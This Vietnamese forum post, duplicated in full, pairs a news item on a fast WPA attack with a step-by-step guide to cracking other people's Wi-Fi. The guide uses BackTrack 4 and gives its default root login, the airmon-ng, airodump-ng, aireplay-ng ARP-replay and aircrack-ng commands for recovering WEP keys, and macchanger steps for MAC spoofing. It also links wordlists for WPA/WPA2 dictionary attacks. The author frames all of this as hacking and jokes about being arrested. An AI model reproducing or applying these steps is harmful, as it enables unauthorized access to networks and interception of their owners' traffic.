- Tham gia
- 24/4/2010
- Bài viết
- 231
TIN VUI CHO CÁC ANH EM ^^!
Hai nhà khoa học máy tính đến từ trường đại học Toshihiro Ohigashi và Masakatu Morii (Nhật Bản) cho biết, họ có thể bẻ khóa hệ thống mã hóa bảo vệ để truy cập trái phép vào mạng Wi-fi (WPA) trong các bộ định tuyến không dây, và qua trình này chỉ mất có 1 phút.
Thông qua cách làm này, kẻ tấn công có thể đọc lưu lượng được mã hóa gửi đi giữa các máy tính và các bộ định tuyến (router) sử dụng hệ thống mã hóa WPA (truy cập Wi-Fi được bảo vệ). Hai nhà khoa học dự kiến sẽ thảo luận chi tiết hơn về cách thức bẻ khóa này tại hội thảo công nghệ diễn ra vào ngày 25/9 tới tại Hiroshima.
Tháng 11 năm ngoái, các nhà nghiên cứu bảo mật đã trình diễn cách thức bẻ khóa WPA và phải mất từ 12-15 phút. Khi đó, kỹ thuật bẻ khóa được thực hiện trên các hệ thống WPA sử dụng thuật toán Temporal Key Integrity Protocol (TKIP) và không thể áp dụng đối với các thiết bị WPA 2 mới hơn hoặc sử dụng thuật toán mã hóa Advanced Encryption Standard (AES) cấp cao hơn. Còn lần này, các nhà nghiên cứu Nhật Bản đưa ra cách bẻ khóa ở mức mới cao hơn, phạm vi rộng hơn và chỉ mất có 60 giây.
Các bộ định tuyến sử dụng hệ thống bảo mật đã gặp nhiều vấn đề bảo mật trong thời gian qua như hệ thống Wired Equivalent Privacy (WEP) được giới thiệu năm 1997 và bị bẻ khóa chỉ vài năm sau đó. Do đó, lần bẻ khóa này của các chuyên gia bảo mật Nhật Bản đã một lần nữa đánh lên hồi chuông cảnh báo độ bảo mật trên các bộ định tuyến Wi-Fi.
Theo VnMedia (PC World)
"BACKTRACK" CÔNG CỤ ha.ck WIFI HÀNG ĐẦU THẾ GIỚI
DÙNG CHO MỌI HỆ ĐIỀU HÀNH
bước 1 downnload BACKTRACK 4 beta
KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD
https://www.backtrack-linux.org/downloads/
bước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó
mediafire
Trích:
https://www.mediafire.com/?sharekey=9feb27a6653605bab94117dade8fc295e04e75f6e8ebb871
CÁI NÀY MÌNH LIỆT KÊ RA CHO NHỮNG BẠN LƯỜI ĐỌC MÀ CHỈ THIX ha.ck LIỀN
LƯU Ý KHI DÙNG BACKTRACT THEO TÀI LIỆU
1.BT 4 beta
2.để tự động boot không chỉnh bất cứ dòng nào
3.login:root
4.pass:toor
5.mở bảng conshole:có 1 ô màu đen bé xíu kế bên startmenu
CÁC BẠN LÀM THEO DÒNG LỆNH SAU
1.iwconfig-->xem tên card mình đang dùng
mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn
2.airmon-ng
3.airmon-ng stop wlan0
4.airmon-ng start wlan0
5.airodump-ng --ivs --write capturefile wlan0
6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0
7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0
8.aircrack-ng -b {ap bssid}
thế là đã có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)
lượng DATA tối thiểu nên chờ là 40 000 nha các bạn
CHANGE mac NẾU CẦN THIẾT
change mac) thực hiện theo các lệnh sau
-(...) tên interface như WLAN0 chẳng hạn
airmon-ng
airmon-ng stop ...
iconfig ... down
macchanger --mac 00:11:22:33:44:55 ...
airmon-ng start ...
và khi đã monitor , thì bạn tiếp tục thưc hiện các lệnh kế , và bây giờ bạn ko cần quan tâm station cũa người ta (khi đến lệnh nào mầ phải điền station thì bạn điền 00:11 ..etc
have fun
bác nào khi chạy iwconfig ko có thông tin card wifi của mình thì nên vào:
những hardware chạy dc trên BT4
những hardware hông hỗ trợ trên BT4
vô đó search theo loại card mà mình sử dụng, ko cần phải đăng kí để search
ĐÂY LÀ ĐOẠN CLIP MANG TÍNH THAM KHẢO VÀ CÓ THỂ KHÁC TÀI LIỆU (ko đáng kể ^^!)
+nếu ai ko hiểu bước nào cứ nhắn vào ,mình sẽ chỉ đến khi lấy được key thôi , (và mình sẽ ko chịu trách nhiệm khi các bạn được police mời đi uống trà đá )
1 VÀI DICTIONARY CHO NHỮNG AI ha.ck WPA & WPA2
Code:
https://websecurity.ro/downloads/dictionary.tar.gz18M
Code:
https://upload.gibbocool.com/files/28GBwordlist.rar74MB
Code:
https://rapidshare.com/files/98295454/huge_wordlist.rar78MB
lưu ý : các dictionary ở trên khi extract ra sẽ có dung lượng vài chục GB ,nên hãy xem xét trườc khi down
còn đây là trang web chứa dictonary ,ai thĩ thì vào tìm hiểu,có luôn các tool để làm wordlist. Nhưng tạo wordlist thường thường tử 3-8 ký tự alphanumeric không cũng đã vài GB rồi
Code:
https://packetstormsecurity.org/Crackers/wordlists/utilities
NGOÀI RA CÒN CÓ THÊM HÀNG CHUC PHẦN MỀM ha.ck KHÁC
THAM KHẢO TẠI :
Trích:https://win7dl.com/download/downloa...trap+depois+da+utima+atualizacao+8122009.html
NHỚ THANKS MÌNH NHÁ , ^^!
Hai nhà khoa học máy tính đến từ trường đại học Toshihiro Ohigashi và Masakatu Morii (Nhật Bản) cho biết, họ có thể bẻ khóa hệ thống mã hóa bảo vệ để truy cập trái phép vào mạng Wi-fi (WPA) trong các bộ định tuyến không dây, và qua trình này chỉ mất có 1 phút.
Thông qua cách làm này, kẻ tấn công có thể đọc lưu lượng được mã hóa gửi đi giữa các máy tính và các bộ định tuyến (router) sử dụng hệ thống mã hóa WPA (truy cập Wi-Fi được bảo vệ). Hai nhà khoa học dự kiến sẽ thảo luận chi tiết hơn về cách thức bẻ khóa này tại hội thảo công nghệ diễn ra vào ngày 25/9 tới tại Hiroshima.
Tháng 11 năm ngoái, các nhà nghiên cứu bảo mật đã trình diễn cách thức bẻ khóa WPA và phải mất từ 12-15 phút. Khi đó, kỹ thuật bẻ khóa được thực hiện trên các hệ thống WPA sử dụng thuật toán Temporal Key Integrity Protocol (TKIP) và không thể áp dụng đối với các thiết bị WPA 2 mới hơn hoặc sử dụng thuật toán mã hóa Advanced Encryption Standard (AES) cấp cao hơn. Còn lần này, các nhà nghiên cứu Nhật Bản đưa ra cách bẻ khóa ở mức mới cao hơn, phạm vi rộng hơn và chỉ mất có 60 giây.
Các bộ định tuyến sử dụng hệ thống bảo mật đã gặp nhiều vấn đề bảo mật trong thời gian qua như hệ thống Wired Equivalent Privacy (WEP) được giới thiệu năm 1997 và bị bẻ khóa chỉ vài năm sau đó. Do đó, lần bẻ khóa này của các chuyên gia bảo mật Nhật Bản đã một lần nữa đánh lên hồi chuông cảnh báo độ bảo mật trên các bộ định tuyến Wi-Fi.
Theo VnMedia (PC World)
"BACKTRACK" CÔNG CỤ ha.ck WIFI HÀNG ĐẦU THẾ GIỚI
DÙNG CHO MỌI HỆ ĐIỀU HÀNH
bước 1 downnload BACKTRACK 4 beta
KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD
https://www.backtrack-linux.org/downloads/
bước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó
mediafire
Trích:
https://www.mediafire.com/?sharekey=9feb27a6653605bab94117dade8fc295e04e75f6e8ebb871
CÁI NÀY MÌNH LIỆT KÊ RA CHO NHỮNG BẠN LƯỜI ĐỌC MÀ CHỈ THIX ha.ck LIỀN
LƯU Ý KHI DÙNG BACKTRACT THEO TÀI LIỆU
1.BT 4 beta
2.để tự động boot không chỉnh bất cứ dòng nào
3.login:root
4.pass:toor
5.mở bảng conshole:có 1 ô màu đen bé xíu kế bên startmenu
CÁC BẠN LÀM THEO DÒNG LỆNH SAU
1.iwconfig-->xem tên card mình đang dùng
mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn
2.airmon-ng
3.airmon-ng stop wlan0
4.airmon-ng start wlan0
5.airodump-ng --ivs --write capturefile wlan0
6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0
7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0
8.aircrack-ng -b {ap bssid}
thế là đã có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)
lượng DATA tối thiểu nên chờ là 40 000 nha các bạn
CHANGE mac NẾU CẦN THIẾT
change mac) thực hiện theo các lệnh sau
-(...) tên interface như WLAN0 chẳng hạn
airmon-ng
airmon-ng stop ...
iconfig ... down
macchanger --mac 00:11:22:33:44:55 ...
airmon-ng start ...
và khi đã monitor , thì bạn tiếp tục thưc hiện các lệnh kế , và bây giờ bạn ko cần quan tâm station cũa người ta (khi đến lệnh nào mầ phải điền station thì bạn điền 00:11 ..etc
have fun
bác nào khi chạy iwconfig ko có thông tin card wifi của mình thì nên vào:
những hardware chạy dc trên BT4
những hardware hông hỗ trợ trên BT4
vô đó search theo loại card mà mình sử dụng, ko cần phải đăng kí để search
ĐÂY LÀ ĐOẠN CLIP MANG TÍNH THAM KHẢO VÀ CÓ THỂ KHÁC TÀI LIỆU (ko đáng kể ^^!)
+nếu ai ko hiểu bước nào cứ nhắn vào ,mình sẽ chỉ đến khi lấy được key thôi , (và mình sẽ ko chịu trách nhiệm khi các bạn được police mời đi uống trà đá )
1 VÀI DICTIONARY CHO NHỮNG AI ha.ck WPA & WPA2
Code:
https://websecurity.ro/downloads/dictionary.tar.gz18M
Code:
https://upload.gibbocool.com/files/28GBwordlist.rar74MB
Code:
https://rapidshare.com/files/98295454/huge_wordlist.rar78MB
lưu ý : các dictionary ở trên khi extract ra sẽ có dung lượng vài chục GB ,nên hãy xem xét trườc khi down
còn đây là trang web chứa dictonary ,ai thĩ thì vào tìm hiểu,có luôn các tool để làm wordlist. Nhưng tạo wordlist thường thường tử 3-8 ký tự alphanumeric không cũng đã vài GB rồi
Code:
https://packetstormsecurity.org/Crackers/wordlists/utilities
NGOÀI RA CÒN CÓ THÊM HÀNG CHUC PHẦN MỀM ha.ck KHÁC
THAM KHẢO TẠI :
Trích:https://win7dl.com/download/downloa...trap+depois+da+utima+atualizacao+8122009.html
NHỚ THANKS MÌNH NHÁ , ^^!
Nguồn: quantrimang